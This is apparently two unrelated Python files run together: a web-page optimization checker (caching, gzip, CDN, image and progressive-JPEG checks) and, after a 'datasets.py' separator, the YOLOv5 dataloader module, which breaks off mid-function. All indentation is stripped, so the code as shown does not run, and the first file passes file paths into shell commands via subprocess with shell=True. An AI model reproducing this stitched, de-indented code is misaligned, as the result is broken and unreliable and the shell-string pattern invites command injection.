optimization_checks_disabled = bool('noopt' in self.job and self.job['noopt'])
if self.requests is not None and not optimization_checks_disabled:
self.running_checks = True
# Run the slow checks in background threads
self.cdn_thread = threading.Thread(target=self.check_cdn)
self.hosting_thread = threading.Thread(target=self.check_hosting)
self.gzip_thread = threading.Thread(target=self.check_gzip)
self.image_thread = threading.Thread(target=self.check_images)
self.progressive_thread = threading.Thread(target=self.check_progressive)
self.cdn_thread.start()
self.hosting_thread.start()
self.gzip_thread.start()
self.image_thread.start()
self.progressive_thread.start()
# collect the miscellaneous results directly
logging.debug('Checking keep-alive.')
self.check_keep_alive()
logging.debug('Checking caching.')
self.check_cache_static()
logging.debug('Optimization checks started.')
def join(self):
"""Wait for the optimization checks to complete and record the results"""
logging.debug('Waiting for optimization checks to complete')
if self.running_checks:
logging.debug('Waiting for progressive JPEG check to complete')
if self.progressive_thread is not None:
self.progressive_thread.join()
self.progressive_thread = None
if self.progressive_time is not None:
logging.debug("Progressive JPEG check took %0.3f seconds", self.progressive_time)
logging.debug('Waiting for gzip check to complete')
if self.gzip_thread is not None:
self.gzip_thread.join()
self.gzip_thread = None
if self.gzip_time is not None:
logging.debug("gzip check took %0.3f seconds", self.gzip_time)
logging.debug('Waiting for image check to complete')
if self.image_thread is not None:
self.image_thread.join()
self.image_thread = None
if self.image_time is not None:
logging.debug("image check took %0.3f seconds", self.image_time)
logging.debug('Waiting for CDN check to complete')
if self.cdn_thread is not None:
self.cdn_thread.join()
self.cdn_thread = None
if self.cdn_time is not None:
logging.debug("CDN check took %0.3f seconds", self.cdn_time)
logging.debug('Waiting for Hosting check to complete')
if self.hosting_thread is not None:
self.hosting_thread.join()
self.hosting_thread = None
if self.hosting_time is not None:
logging.debug("Hosting check took %0.3f seconds", self.hosting_time)
# Merge the results together
for request_id in self.cdn_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cdn'] = self.cdn_results[request_id]
for request_id in self.gzip_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['gzip'] = self.gzip_results[request_id]
for request_id in self.image_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['image'] = self.image_results[request_id]
for request_id in self.progressive_results:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['progressive'] = self.progressive_results[request_id]
if self.task is not None and 'page_data' in self.task:
for name in self.hosting_results:
self.task['page_data'][name] = self.hosting_results[name]
# Save the results
if self.results:
path = os.path.join(self.task['dir'], self.task['prefix']) + '_optimization.json.gz'
gz_file = gzip.open(path, 'wb', 7)
if gz_file:
gz_file.write(json.dumps(self.results))
gz_file.close()
logging.debug('Optimization checks complete')
return self.results
def check_keep_alive(self):
"""Check for requests where the connection is force-closed"""
from urlparse import urlsplit
# build a list of origins and how many requests were issued to each
origins = {}
for request_id in self.requests:
request = self.requests[request_id]
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origin not in origins:
origins[origin] = 0
origins[origin] += 1
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'url' in request:
check = {'score': 100}
url = request['full_url'] if 'full_url' in request else request['url']
parsed = urlsplit(url)
origin = parsed.scheme + '://' + parsed.netloc
if origins[origin] > 1:
check['score'] = 100
keep_alive = self.get_header_value(request['response_headers'],
'Connection')
if keep_alive is not None and keep_alive.lower().strip().find('close') > -1:
check['score'] = 0
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['keep_alive'] = check
except Exception:
pass
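# Example outcome (illustrative): if an origin served several requests and one response
# carried "Connection: close", that request's keep_alive score is 0; requests to origins
# that only served a single request keep the default score of 100.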
def get_time_remaining(self, request):
"""See if a request is static and how long it can be cached for"""
from email.utils import parsedate
re_max_age = re.compile(r'max-age[ ]*=[ ]*(?P<maxage>[\d]+)')
is_static = False
time_remaining = -1
try:
if 'response_headers' in request:
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
if content_length == 0:
return is_static, time_remaining
if 'response_headers' in request:
content_type = self.get_header_value(request['response_headers'],
'Content-Type')
if content_type is None or \
(content_type.find('/html') == -1 and
content_type.find('/cache-manifest') == -1):
is_static = True
cache = self.get_header_value(request['response_headers'], 'Cache-Control')
pragma = self.get_header_value(request['response_headers'], 'Pragma')
expires = self.get_header_value(request['response_headers'], 'Expires')
if cache is not None:
cache = cache.lower()
if cache.find('no-store') > -1 or cache.find('no-cache') > -1:
is_static = False
if is_static and pragma is not None:
pragma = pragma.lower()
if pragma.find('no-cache') > -1:
is_static = False
if is_static:
time_remaining = 0
if cache is not None:
matches = re.search(re_max_age, cache)
if matches:
time_remaining = int(matches.groupdict().get('maxage'))
age = self.get_header_value(request['response_headers'], 'Age')
if time_remaining == 0:
is_static = False
time_remaining = -1
elif age is not None:
time_remaining -= int(re.search(r'\d+',
str(age).strip()).group())
elif expires is not None:
date = self.get_header_value(request['response_headers'], 'Date')
exp = time.mktime(parsedate(expires))
if date is not None:
now = time.mktime(parsedate(date))
else:
now = time.time()
time_remaining = int(exp - now)
if time_remaining < 0:
is_static = False
except Exception:
pass
return is_static, time_remaining
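# Worked example (illustrative): a 200 response with Content-Type: image/png,
# Cache-Control: max-age=86400 and Age: 400 is treated as static with
# time_remaining = 86400 - 400 = 86000 seconds, while the same response with
# Cache-Control: no-store (or a text/html Content-Type) yields is_static = False
# and time_remaining = -1.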
def check_cache_static(self):
"""Check static resources for how long they are cacheable for"""
for request_id in self.requests:
try:
request = self.requests[request_id]
check = {'score': -1, 'time': 0}
if 'status' in request and request['status'] == 200:
is_static, time_remaining = self.get_time_remaining(request)
if is_static:
check['time'] = time_remaining
if time_remaining >= 604800: # 7 days
check['score'] = 100
elif time_remaining >= 3600: # 1 hour
check['score'] = 50
else:
check['score'] = 0
if check['score'] >= 0:
if request_id not in self.results:
self.results[request_id] = {}
self.results[request_id]['cache'] = check
except Exception:
pass
def check_hosting(self):
"""Pull the data needed to determine the hosting"""
start = monotonic.monotonic()
self.hosting_results['base_page_ip_ptr'] = ''
self.hosting_results['base_page_cname'] = ''
self.hosting_results['base_page_dns_server'] = ''
domain = None
if self.task is not None and 'page_data' in self.task and \
'document_hostname' in self.task['page_data']:
domain = self.task['page_data']['document_hostname']
if domain is not None:
try:
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 5
dns_resolver.lifetime = 5
# reverse-lookup the edge server
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
self.hosting_results['base_page_ip_ptr'] = name.strip('. ')
except Exception:
pass
# get the CNAME for the address
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
self.hosting_results['base_page_cname'] = name
break
except Exception:
pass
# get the name server for the domain
done = False
while domain is not None and not done:
try:
dns_servers = dns_resolver.query(domain, "NS")
dns_name = str(dns_servers[0].target).strip('. ')
if dns_name:
self.hosting_results['base_page_dns_server'] = dns_name
done = True
except Exception:
pass
pos = domain.find('.')
if pos > 0:
domain = domain[pos + 1:]
else:
domain = None
except Exception:
pass
self.hosting_time = monotonic.monotonic() - start
def check_cdn(self):
"""Check each request to see if it was served from a CDN"""
from urlparse import urlparse
start = monotonic.monotonic()
# First pass, build a list of domains and see if the headers or domain matches
static_requests = {}
domains = {}
for request_id in self.requests:
request = self.requests[request_id]
is_static, _ = self.get_time_remaining(request)
if is_static:
static_requests[request_id] = True
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain not in domains:
# Check the domain itself against the CDN list
domains[domain] = ''
provider = self.check_cdn_name(domain)
if provider is not None:
domains[domain] = provider
# Spawn several workers to do CNAME lookups for the unknown domains
count = 0
for domain in domains:
if not domains[domain]:
count += 1
self.dns_lookup_queue.put(domain)
if count:
thread_count = min(10, count)
threads = []
for _ in xrange(thread_count):
thread = threading.Thread(target=self.dns_worker)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
try:
while True:
dns_result = self.dns_result_queue.get_nowait()
domains[dns_result['domain']] = dns_result['provider']
except Exception:
pass
# Final pass, populate the CDN info for each request
for request_id in self.requests:
check = {'score': -1, 'provider': ''}
request = self.requests[request_id]
if request_id in static_requests:
check['score'] = 0
if 'url' in request:
url = request['full_url'] if 'full_url' in request else request['url']
domain = urlparse(url).hostname
if domain is not None:
if domain in domains and domains[domain]:
check['score'] = 100
check['provider'] = domains[domain]
if not check['provider'] and 'response_headers' in request:
provider = self.check_cdn_headers(request['response_headers'])
if provider is not None:
check['score'] = 100
check['provider'] = provider
self.cdn_results[request_id] = check
self.cdn_time = monotonic.monotonic() - start
def find_dns_cdn(self, domain, depth=0):
"""Recursively check a CNAME chain"""
from dns import resolver, reversename
dns_resolver = resolver.Resolver()
dns_resolver.timeout = 1
dns_resolver.lifetime = 1
provider = self.check_cdn_name(domain)
# First do a CNAME check
if provider is None:
try:
answers = dns_resolver.query(domain, 'CNAME')
if answers and len(answers):
for rdata in answers:
name = '.'.join(rdata.target).strip(' .')
if name != domain:
provider = self.check_cdn_name(name)
if provider is None and depth < 10:
provider = self.find_dns_cdn(name, depth + 1)
if provider is not None:
break
except Exception:
pass
# Try a reverse-lookup of the address
if provider is None:
try:
addresses = dns_resolver.query(domain)
if addresses:
addr = str(addresses[0])
addr_name = reversename.from_address(addr)
if addr_name:
name = str(dns_resolver.query(addr_name, "PTR")[0])
if name:
provider = self.check_cdn_name(name)
except Exception:
pass
return provider
def dns_worker(self):
"""Handle the DNS CNAME lookups and checking in multiple threads"""
try:
while True:
domain = self.dns_lookup_queue.get_nowait()
provider = self.find_dns_cdn(domain)
if provider is not None:
self.dns_result_queue.put({'domain': domain, 'provider': provider})
self.dns_lookup_queue.task_done()
except Exception:
pass
def check_cdn_name(self, domain):
"""Check the given domain against our cname list"""
if domain is not None and len(domain):
check_name = domain.lower()
for cdn in self.cdn_cnames:
for cname in self.cdn_cnames[cdn]:
if check_name.find(cname) > -1:
return cdn
return None
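    # Example with hypothetical data (self.cdn_cnames is not shown in this excerpt; it is
    # assumed to map provider name -> list of CNAME substrings), so a lookup behaves like:
    #   self.cdn_cnames = {'Cloudflare': ['cloudflare.'], 'Fastly': ['fastly.net']}
    #   self.check_cdn_name('cdn.example.com.cdn.cloudflare.net')  # -> 'Cloudflare'
    #   self.check_cdn_name('origin.example.com')                  # -> None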
def check_cdn_headers(self, headers):
"""Check the given headers against our header list"""
matched_cdns = []
for cdn in self.cdn_headers:
for header_group in self.cdn_headers[cdn]:
all_match = True
for name in header_group:
value = self.get_header_value(headers, name)
if value is None:
all_match = False
break
else:
value = value.lower()
check = header_group[name].lower()
if len(check) and value.find(check) == -1:
all_match = False
break
if all_match:
matched_cdns.append(cdn)
                    break
if not len(matched_cdns):
return None
return ', '.join(matched_cdns)
def check_gzip(self):
"""Check each request to see if it can be compressed"""
start = monotonic.monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if 'objectSize' in request:
content_length = request['objectSize']
elif content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
if content_length is None:
content_length = 0
check = {'score': 0, 'size': content_length, 'target_size': content_length}
encoding = None
if 'response_headers' in request:
encoding = self.get_header_value(request['response_headers'],
'Content-Encoding')
# Check for responses that are already compressed (ignore the level)
if encoding is not None:
if encoding.find('gzip') >= 0 or \
encoding.find('deflate') >= 0 or \
encoding.find('br') >= 0:
check['score'] = 100
# Ignore small responses that will fit in a packet
if not check['score'] and content_length < 1400:
check['score'] = -1
# Try compressing it if it isn't an image
if not check['score'] and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type is not None:
check['score'] = -1
else:
out_file = request['body'] + '.gzip'
with open(request['body'], 'rb') as f_in:
with gzip.open(out_file, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
if os.path.isfile(out_file):
target_size = os.path.getsize(out_file)
try:
os.remove(out_file)
except Exception:
pass
if target_size is not None:
delta = content_length - target_size
# Only count it if there is at least 1 packet and 10% savings
if target_size > 0 and \
delta > 1400 and \
target_size < (content_length * 0.9):
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = -1
else:
check['score'] = -1
else:
check['score'] = -1
if check['score'] >= 0:
self.gzip_results[request_id] = check
except Exception:
pass
self.gzip_time = monotonic.monotonic() - start
def check_images(self):
"""Check each request to see if images can be compressed better"""
start = monotonic.monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
content_length = self.get_header_value(request['response_headers'],
'Content-Length')
if content_length is not None:
content_length = int(re.search(r'\d+', str(content_length)).group())
elif 'transfer_size' in request:
content_length = request['transfer_size']
check = {'score': -1, 'size': content_length, 'target_size': content_length}
if content_length and 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
if content_length < 1400:
check['score'] = 100
else:
# Compress it as a quality 85 stripped progressive image and compare
jpeg_file = request['body'] + '.jpg'
command = '{0} -define jpeg:dct-method=fast -strip '\
'-interlace Plane -quality 85 '\
'"{1}" "{2}"'.format(self.job['image_magick']['convert'],
request['body'], jpeg_file)
subprocess.call(command, shell=True)
if os.path.isfile(jpeg_file):
target_size = os.path.getsize(jpeg_file)
try:
os.remove(jpeg_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'png':
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
if content_length < 1400:
check['score'] = 100
else:
# spell-checker: disable
image_chunks = ["iCCP", "tIME", "gAMA", "PLTE", "acTL", "IHDR", "cHRM",
"bKGD", "tRNS", "sBIT", "sRGB", "pHYs", "hIST", "vpAg",
"oFFs", "fcTL", "fdAT", "IDAT"]
# spell-checker: enable
body = request['response_body']
image_size = len(body)
valid = True
target_size = 8
bytes_remaining = image_size - 8
pos = 8
while valid and bytes_remaining >= 4:
chunk_len = struct.unpack('>I', body[pos: pos + 4])[0]
pos += 4
if chunk_len + 12 <= bytes_remaining:
chunk_type = body[pos: pos + 4]
pos += 4
if chunk_type in image_chunks:
target_size += chunk_len + 12
pos += chunk_len + 4 # Skip the data and CRC
bytes_remaining -= chunk_len + 12
else:
valid = False
bytes_remaining = 0
if valid:
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'gif':
if content_length < 1400:
check['score'] = 100
else:
is_animated = False
from PIL import Image
with Image.open(request['body']) as gif:
try:
gif.seek(1)
except EOFError:
is_animated = False
else:
is_animated = True
if is_animated:
check['score'] = 100
else:
# Convert it to a PNG
png_file = request['body'] + '.png'
command = 'convert "{0}" "{1}"'.format(request['body'], png_file)
subprocess.call(command, shell=True)
if os.path.isfile(png_file):
target_size = os.path.getsize(png_file)
try:
os.remove(png_file)
except Exception:
pass
delta = content_length - target_size
# Only count it if there is at least 1 packet savings
if target_size > 0 and delta > 1400:
check['target_size'] = target_size
check['score'] = int(target_size * 100 / content_length)
else:
check['score'] = 100
elif sniff_type == 'webp':
check['score'] = 100
if check['score'] >= 0:
self.image_results[request_id] = check
except Exception:
pass
self.image_time = monotonic.monotonic() - start
def check_progressive(self):
"""Count the number of scan lines in each jpeg"""
from PIL import Image
start = monotonic.monotonic()
for request_id in self.requests:
try:
request = self.requests[request_id]
if 'body' in request:
sniff_type = self.sniff_file_content(request['body'])
if sniff_type == 'jpeg':
check = {'size': os.path.getsize(request['body']), 'scan_count': 1}
image = Image.open(request['body'])
info = dict(image.info)
image.close()
if 'progression' in info and info['progression']:
check['scan_count'] = 0
if 'response_body' not in request:
request['response_body'] = ''
with open(request['body'], 'rb') as f_in:
request['response_body'] = f_in.read()
body = request['response_body']
content_length = len(request['response_body'])
pos = 0
try:
while pos < content_length:
block = struct.unpack('B', body[pos])[0]
pos += 1
if block != 0xff:
break
block = struct.unpack('B', body[pos])[0]
pos += 1
while block == 0xff:
block = struct.unpack('B', body[pos])[0]
pos += 1
if block == 0x01 or (block >= 0xd0 and block <= 0xd9):
continue
elif block == 0xda: # Image data
check['scan_count'] += 1
# Seek to the next non-padded 0xff to find the next marker
found = False
while not found and pos < content_length:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value == 0xff:
value = struct.unpack('B', body[pos])[0]
pos += 1
if value != 0x00:
found = True
pos -= 2
else:
chunk = body[pos: pos + 2]
block_size = struct.unpack('2B', chunk)
pos += 2
block_size = block_size[0] * 256 + block_size[1] - 2
pos += block_size
except Exception:
pass
self.progressive_results[request_id] = check
except Exception:
pass
self.progressive_time = monotonic.monotonic() - start
def get_header_value(self, headers, name):
"""Get the value for the requested header"""
value = None
if headers:
if name in headers:
value = headers[name]
else:
find = name.lower()
for header_name in headers:
check = header_name.lower()
if check == find or (check[0] == ':' and check[1:] == find):
value = headers[header_name]
break
return value
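    # Usage sketch (values are illustrative only): the lookup is case-insensitive and also
    # matches HTTP/2-style pseudo-header names that carry a leading ':':
    #   self.get_header_value({'Content-Type': 'image/jpeg'}, 'content-type')  # -> 'image/jpeg'
    #   self.get_header_value({':status': '200'}, 'status')                    # -> '200'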
def sniff_content(self, raw_bytes):
"""Check the beginning of the file to see if it is a known image type"""
content_type = None
hex_bytes = binascii.hexlify(raw_bytes[:14]).lower()
# spell-checker: disable
if hex_bytes[0:6] == 'ffd8ff':
content_type = 'jpeg'
elif hex_bytes[0:16] == '89504e470d0a1a0a':
content_type = 'png'
elif raw_bytes[:6] == 'GIF87a' or raw_bytes[:6] == 'GIF89a':
content_type = 'gif'
elif raw_bytes[:4] == 'RIFF' and raw_bytes[8:14] == 'WEBPVP':
content_type = 'webp'
elif raw_bytes[:4] == 'wOF2':
content_type = 'WOFF2'
# spell-checker: enable
return content_type
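    # Magic bytes checked above, summarized (first bytes of the body -> sniffed type):
    #   ff d8 ff                   -> 'jpeg'
    #   89 50 4e 47 0d 0a 1a 0a    -> 'png'
    #   'GIF87a' or 'GIF89a'       -> 'gif'
    #   'RIFF' ... 'WEBPVP'        -> 'webp'
    #   'wOF2'                     -> 'WOFF2'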
def sniff_file_content(self, image_file):
"""Sniff the content type from a file"""
content_type = None
with open(image_file, 'rb') as f_in:
raw = f_in.read(14)
content_type = self.sniff_content(raw)
return content_type
|
datasets.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from zipfile import ZipFile
import cv2
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from utils.general import (DATASETS_DIR, LOGGER, NUM_THREADS, check_dataset, check_requirements, check_yaml, clean_str,
segments2boxes, xyn2xy, xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from utils.torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = 'bmp', 'dng', 'jpeg', 'jpg', 'mpo', 'png', 'tif', 'tiff', 'webp' # include image suffixes
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except Exception:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
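# Usage sketch for exif_transpose() (file name is hypothetical): rotate a photo so the pixel
# data matches the EXIF Orientation tag, then drop the tag so it is not applied twice.
#   from PIL import Image
#   im = exif_transpose(Image.open('photo_from_camera.jpg'))
#   im.save('upright.jpg')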
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix='', shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nd = torch.cuda.device_count() # number of CUDA devices
nw = min([os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn), dataset
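# Usage sketch for create_dataloader() (path and parameter values are illustrative, not from
# the original source); with augment=False no hyperparameter dict is needed:
#   loader, dataset = create_dataloader('coco128/images/train2017', imgsz=640, batch_size=16,
#                                       stride=32, augment=False, workers=4, shuffle=True)
#   for imgs, targets, paths, shapes in loader:
#       pass  # imgs: uint8 BCHW tensor; targets: (n, 6) rows of [image_idx, cls, x, y, w, h]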
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
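# Design note: InfiniteDataLoader wraps its batch_sampler in _RepeatSampler so the sampler
# never runs out and the worker processes are created once and reused across epochs, while
# __len__/__iter__ still yield one epoch's worth of batches per pass. Sketch (illustrative):
#   loader = InfiniteDataLoader(dataset, batch_size=16, num_workers=4, shuffle=True)
#   for epoch in range(3):
#       for batch in loader:  # the same workers serve every epoch
#           pass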
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
while not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if 'youtube.com/' in s or 'youtu.be/' in s: # if source is YouTube video
check_requirements(('pafy', 'youtube_dl==2020.12.2'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) # warning: may return 0 or nan
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
self.fps[i] = max((fps if math.isfinite(fps) else 0) % 100, 0) or 30 # 30 FPS fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, frame array, inference every 'read' frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] = np.zeros_like(self.imgs[i])
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
